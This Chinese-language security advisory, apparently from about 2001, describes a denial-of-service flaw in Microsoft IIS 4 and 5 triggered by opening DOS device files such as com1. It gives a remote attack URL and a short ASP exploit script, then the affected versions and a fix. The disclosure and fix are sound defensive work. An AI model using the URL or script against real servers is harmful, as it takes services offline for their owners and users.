MS IIS 拒绝服务漏洞

/ns/ld/win/data/20010708173754.htm

涉及程序:
MS IIS

描述:
利用设备文件导致 MS IIS 拒绝服务漏洞

详细:
发现 MS IIS 存在本地和远程拒绝服务漏洞。当使用 Scripting.FileSystemObject 打开或读取设备文件时 (com1, com2, etc.) 将会导致 ASP-processor (asp.dll) 停止响应。

对于本地攻击者,如果有创建 .asp 文件的权限,将能导致服务器当机。

对于远程攻击,当参数被解析成设备文件时,将会导致服务器当机:
http://host.int/scripts/script.asp?script=com1


以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负


ASP-Exploit:

<%
Dim strFileName, objFSO, objFile

Set objFSO = Server.CreateObject("Scripting.FileSystemObject")

strFileName = "com1"

Set objFile = objFSO.OpenTextFile(strFileName)

Response.Write objFile.ReadAll

objFile.Close


%>

受影响系统:
IIS 4,5

解决方案:
修补 Scripting.FileSystemObject ,使它在打开一个文件之前必须检查其是否存在